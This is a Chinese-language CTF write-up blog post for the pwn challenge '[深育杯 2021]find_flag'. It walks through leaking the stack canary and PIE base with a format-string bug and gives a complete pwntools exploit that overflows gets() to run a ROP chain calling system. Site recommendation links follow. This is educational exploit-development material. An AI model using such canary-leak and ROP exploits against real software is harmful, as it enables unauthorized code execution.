新手必看——超详细:[深育杯 2021]find_flag

已于 2023-06-09 21:35:21 修改
阅读量858 收藏 3
点赞数 4
分类专栏: pwn pie canary 文章标签: 安全
于 2023-06-09 21:34:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IT_huanhuan/article/details/131135230
版权
pwn 同时被 3 个专栏收录
6 篇文章 0 订阅
订阅专栏
canary
2 篇文章 0 订阅
订阅专栏
pie
1 篇文章 0 订阅
订阅专栏

题目复现——[深育杯 2021]find_flag

pie与canary同时开启,并且有格式化字符串。

检查程序:

保护很全面。

在这里插入图片描述

可以看的出,在第一处有格式化字符串漏洞。

IDA分析:

在这里插入图片描述

看了一下mian函数,将函数重命名,pwn是我们有漏洞的地方。

在这里插入图片描述

可以看到gets函数可以进行栈溢出,但是有canary保护,所以我们需要泄露canary,可以利用格式化字符串去泄露canary并覆写在栈上。

在这里插入图片描述

发现backdoor。但是开了pie,我们应该无法利用后们,但是好在只读变量(const修饰的)和字符串变量放入rodata 区。还是可以利用的。

gdb分析:

打断点在printf处(不知到为什么不能在main函数处大不了断点,很奇怪

在这里插入图片描述

一直步到下图处

在这里插入图片描述

看栈信息,很明显能看到canary——>

0b:0058│ 0x7fffffffdd18 ◂— 0x121203e586d31600

在这里插入图片描述

看一下距格式化字符串的偏移。

在这里插入图片描述

但是难点不是在泄露canary,而是在泄露基址上去,需要了解pie和栈,可以看到,在rbp下面刚好有一个我们能泄露函数基址,但是为什么是他呢?

考虑因为这个地址代表了我们的main函数结尾的一个部分的地址,我们可以通过这个地址进而计算出栈的基址。

在这里插入图片描述

接下来就是确定偏移了(须注意的一点就是需要在gets函数输入后,在查看栈的情况,这样更好确定。

在这里插入图片描述

exp构造环节:

既然我们找到了,我们就构造payload1 去泄露canary和基址

paylaod1 = b'%17$p---%19$p'

在构造rop链的准备。

Base = base - 0x146F

system = Base + elf.sym['system']
catflag = Base + 0x2004 # robata中的字符串
#ROPgadget --binary file --only 'pop|ret'
rdi = Base + 0x14E3
ret = Base + 0x101A

exp:

from pwn import *
context.log_level = 'debug'

local = 1
if local:
	p = process('ff')
else:
	p = remote('node4.anna.nssctf.cn',28068)

elf = ELF('./ff')

context.log_level = 'debug'
context(arch='amd64',os='linux')

p.recvuntil(b'name? ')
payload1 = b'%17$p---%19$p'
p.sendline(payload1)
p.recvuntil(b'you, ')

canary = int(p.recv(18), 16)
print(hex(canary))

p.recvuntil(b'---')
base = int(p.recv(14), 16)
print(hex(base))

Base = base - 0x146F

system = Base + elf.sym['system']
catflag = Base + 0x2004
#ropgadget
rdi = Base + 0x14E3
ret = Base + 0x101A

payload = b'a'*0x38 + p64(canary) + b'a'*8 + p64(ret) + p64(rdi) + p64(catflag) + p64(system)
p.recvuntil(b'else? ')
p.sendline(payload)
p.recv()
p.interactive()

结果:

在这里插入图片描述

Y_huanhuan
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
bundled-nest::collision:Nest:Japanese_symbol_for_beginner:Webpack:Japanese_symbol_for_beginner:Docker:collision:---:Japanese_castle:现在存档以供历史参考:shinto_shrine:
05-26
有关详细信息,请参阅: 在许多实际场景中(取决于所使用的库),不应将Node.js应用程序(不仅是NestJS应用程序)与所有依赖项(位于node_modules文件夹中的外部软件包)捆绑在一起。 尽管这可能会使您的docker映像...
解决vue net :ERR_CONNECTION_REFUSED报错问题
10-14
修改后的`dev`脚本可能看起来像这样: ```json "dev": "webpack-dev-server --inline --progress --config build/webpack.dev.conf.js --host <your_fixed_ip>" ``` 请将`<your_fixed_ip>`替换为你当前网络环境下...
【PWN · ret2text & 格式化字符串漏洞 | NX | Canary | PIE】[深育杯 2021]find_flag
Mr_Fmnwon的博客
06-09 1752
Canary、PIE开启,如何进行绕过呢?【PWN · ret2text | PIE 】[NISACTF 2022]ezpie_Mr_Fmnwon的博客-CSDN博客【PWN · ret2libc | Canary】[2021 鹤城杯]littleof_Mr_Fmnwon的博客-CSDN博客而本题也无外乎这两个要点,然而还是让本蒟蒻感到头疼QAQ(一点睡,六点半起,一整个学期伤身体,ICU里喝小米)本题是遇到的第一道保护全开的题目,各种保护让人头大,对各种漏洞的综合利用也有更高的要求,加油!
[深育杯 2021]find_flag wp(绕过PIE和canary 格式化字符串 栈溢出 )
qq_73667990的博客
06-28 591
直接跳到格式化字符串漏洞处,然后查看栈结构,rbp上下分别是canary和返回地址。所以我们要输入0x40-0x8来把v2到canary填充完,然后再原封不动的输入canary,然后再输入0x8个a填充rbp指针,然后再输入后门函数地址覆盖返回地址。所以我们栈的第一个位置其实是rdi,所以canary和return的位置分别为17和19,我们输入。开了canary保护,栈溢出时,要还原canary,开了PIE,地址会改变。有了返回地址,我们减去偏移就能得到程序基地址,返回地址偏移为0x146F。
第一届“百度杯”信息安全攻防总决赛 find the flag WP
豆傻小饼干随记
06-06 1689
打开图片后发现流量包有问题,于是使用http://f00l.de/hacking/pcapfix.php修复流量包,在流量包中有提示 发现当帧长度为72时,每个id的逆序值符合格式要求,于是编写脚本 #!/usr/bin/env python # -*- coding:utf-8 -*- # -- author:valecalida -- # Edit time: 2021/6/6 8:35 from pyshark import FileCapture from binascii impo...
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
2021深育杯线上初赛官方WriteUp
further_eye的博客
11-18 1万+
Web EasySQL 访问robots.txt,可得三个文件index.php、config.php、helpyou2findflag.php。 fuzz黑名单,可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。 经测试可得到闭合方式为括号,且白名单为数据库记录行数,使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。 show variables like '%slow_query_log%'; # 查询慢日志记录是否开启 setgloba
mysql中find_in_set()函数的使用及in()用法详解
09-09
在MySQL数据库中,`FIND_IN_SET()` 和 `IN()` 是两种不同的用于查询的函数,它们各有其特定的用途和应用场景。以下是对这两个函数的详细解释。 `FIND_IN_SET()` 函数主要用于在一个以逗号分隔的字符串列表中查找...
king代码matlab-find_face_landmarks_Dlib:find_face_landmarks_Dlib
05-28
请参阅有关该项目的更多详细信息,更多资源和更新。 用法 有3种使用库的方法: Matlab界面。 请看一下。 C ++接口。 请看一下。 命令行工具。 使用--help可获得有关每个工具的更多信息。 依存关系 图书馆 最低版本 ...
2021深育杯-网络安全大赛专业竞赛部分wp
七堇年的博客
12-23 2323
2021深育杯-网络安全大赛专业竞赛
NSSCTF 刷题记录
红叶的博客
03-07 923
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
[深育杯 2021]---Disk
pop_cheng的博客
11-21 265
...............
linux find flag命令
weixin_48266255的博客
08-11 2902
代码】linux find 命令。
2021湖湘杯web部分wp
fmyyy1的博客
11-14 1846
前言 快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!) 今天上线看看题 easywill 这题没啥好说,跟tp3的rce差不多 直接 ?name=cfile&value=/etc/passwd 就能文件包含,之后找不到flag,用拟态的的那个包含pearcmd.php就能getshell Pentest in Autumn 下个pom.xml附件 看到shiro <?xml version="1.0" encoding="UTF-8"
Linux命令:find
qq_34810707的博客
10-17 1365
find顾名思义就是查找,Linux下find命令提供相当多的查找条件,因此功能比较强大,可以在众多文件或目录下查找你想要的任何文件或目录。 find 命令格式:find pathname -options [-print -exec -ok...] pathname表示find命令所查找的文件或目录的路径。例如:/home/tools/tongyan -print: find命令将匹配的文...
OpenCV(三):一步步实现图像定位(Python版)
热门推荐
强强的博客
01-22 2万+
一、预期目标 如下图,要识别图中的国旗,然后框选出来,并且返回国旗的中心位置,效果如下: 彩色图像大小: (400,264) 目标中心位置: (225, 218) 二、准备工作 将 ...
C++ string中的find()函数
xiaoxiaosuwy的博客
06-14 7603
转载:https://www.cnblogs.com/wkfvawl/p/9429128.html 1.string中find()返回值是字母在母串中的位置(下标记录),如果没有找到,那么会返回一个特别的标记npos。(返回值可以看成是一个int型的数) #include<cstring> #include<cstdio> #include<iostream&g...
find()函数
小白_努力
06-02 4070
泛型算法的 find: 在非string类型的容器里,可以直接找出所对应的元素. find函数需要几个参数:迭代器,下标值,所要找的元素vector a; find(a.begin(),a.end(),1);这句话就表示从a的头开始一直到尾,找到第一个值为1的元素,返回的是一个指向该元素的迭代器。find在string容器中用途比较广:find_first_of, find_last_of
std::range::find_if 从后往前找
最新发布
08-23
std::find_if函数是从前往后找的,它接受一个范围,从第一个元素开始,依次检查每个元素,直到找到满足条件的元素或者到达范围的末尾。如果要从后往前查找,可以使用std::find_if的反向迭代器和反向范围,来实现从后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y_huanhuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值